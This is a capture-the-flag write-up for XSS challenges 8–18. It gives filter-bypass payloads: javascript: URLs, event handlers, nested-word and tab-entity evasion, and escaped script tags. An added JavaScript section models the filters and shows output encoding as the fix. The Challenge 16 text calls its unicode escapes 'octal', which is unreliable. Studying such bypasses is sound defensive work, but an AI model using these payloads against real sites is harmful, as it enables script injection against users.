Challenge 8:
This one uses the javascript: pseudo-protocol; please use the IE browser.
Enter the following: javascript:alert(document.domain);
Challenge 9:
The hint says to use UTF-7 XSS, but I did not do it.
Challenge 10:
Here the word domain is filtered, so the input can be constructed as follows: "onmouseover=alert(document.domadomainin); Once the filter removes the inner domain, the remaining characters form a new domain.
Challenge 11:
"><a href="javascr&#09;ipt:alert(document.domain);">12</a>
Idea: use &#09; (the escaped tab character) to avoid the filter. &#09; needs to be used inside a URL, so build a hyperlink.
Click the link to pass.
Challenge 12:
Found that it filters out "<>. With IE you can use two backticks (``) to close the value; the browser will not automatically add ".
``onmouseover=alert(document.domain);
It seems that this method does not work on Firefox.
Challenge 13:
Challenge 14:
The above two challenges can be done on the IE8 engine. Because the vulnerabilities are no longer current, they are skipped here.
Challenge 15:
It was observed that the contents of the text box are placed into document.write, but the following content is filtered
It can be escaped using hexadecimal ASCII codes.
Then \ turned out to be filtered as well, so use two \ to escape the \.
The code is as follows: \\x3cscript\\x3ealert(document.domain);\\x3c/script\\x3e
Submit, and the popup window appears.
Challenge 16:
The principle is the same as Challenge 15. This time hexadecimal cannot be used for the escape, but decimal or octal can.
Taking octal as an example:
\\u003cscript\\u003ealert(document.domain);\\u003c/script\\u003e
Submit, and the popup window appears successfully.
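The filters in Challenges 10, 15 and 16 fail for the same reason: characters are deleted before a later step (the deletion itself, or JavaScript string decoding) puts them back. The following is an added example, not code from the challenge site or from this write-up; all function names are hypothetical, and the backslash handling in serverFilter15 is an assumption based on the description above.

```javascript
// Constructed models of the filters described in this write-up.
// They are assumptions for illustration, not the challenge site's code.

// Challenge 10: the word "domain" is deleted in a single pass.
function stripOnce(input) {
  return input.replace(/domain/g, "");
}

// Challenge 15/16 (assumed model): < and > are deleted, and the server treats
// \ as an escape character, so \\ becomes \ and a lone \ is dropped.
function serverFilter15(input) {
  return input.replace(/[<>]/g, "").replace(/\\(.?)/g, "$1");
}

// What the JavaScript engine then does to the body of a string literal:
// \xHH and \uHHHH (the form in the Challenge 16 input) become characters.
function decodeJsString(body) {
  return body.replace(/\\x([0-9a-fA-F]{2})|\\u([0-9a-fA-F]{4})/g,
    (_, x, u) => String.fromCharCode(parseInt(x || u, 16)));
}

// Hardened form: do not delete characters; encode for the output context
// at the sink, after every decoding step has already happened.
function escapeHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;", "`": "&#96;" };
  return text.replace(/[&<>"'`]/g, (c) => map[c]);
}

// The value that finally reaches document.write in the modelled page.
function reachesSink(input) {
  return decodeJsString(serverFilter15(input));
}

// Inputs taken from the Challenge 10, 15 and 16 sections above.
const input10 = '"onmouseover=alert(document.domadomainin);';
const input15 = String.raw`\\x3cscript\\x3ealert(document.domain);\\x3c/script\\x3e`;
const input16 = String.raw`\\u003cscript\\u003ealert(document.domain);\\u003c/script\\u003e`;

console.log(stripOnce(input10));               // filter output still contains "domain"
console.log(reachesSink(input15));             // markup reassembled after the filter ran
console.log(escapeHtml(reachesSink(input16))); // encoded at the sink: inert text
```

Encoding at the sink works here because it runs after the string has been decoded, which is the step the deletion filters cannot see.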
Challenge 17:
Challenge 18:
These have the same timeliness problem, so let's skip them.
XSS Challenge problem-solving ideas (8-18)